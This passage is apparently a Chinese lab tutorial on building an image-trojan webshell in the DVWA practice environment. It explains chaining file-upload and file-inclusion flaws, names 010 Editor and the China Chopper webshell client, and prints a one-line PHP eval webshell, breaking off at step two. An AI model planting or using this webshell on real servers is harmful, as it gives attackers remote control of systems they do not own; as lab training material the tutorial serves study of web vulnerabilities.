交流Q群:876554035
一,图片木马原理
图片木马以文件上传漏洞为基本条件,将可执行的脚本写入到图片中去,再利用文件包含漏洞来执行图片中的一句话木马,从而获取目标服务器权限。
二.工具及环境
DVWA靶场环境
010Editor
中国菜刀
三.具体步骤
1.登陆DVWA靶场,调整安全级别为high,进入到File Upload页面。
图一 登陆界面
图二 选择安全级别,进入
2.利用010 Editor工具制作一句话图片木马,一句话木马为 <?php @eval($_POST[‘pass’]);?>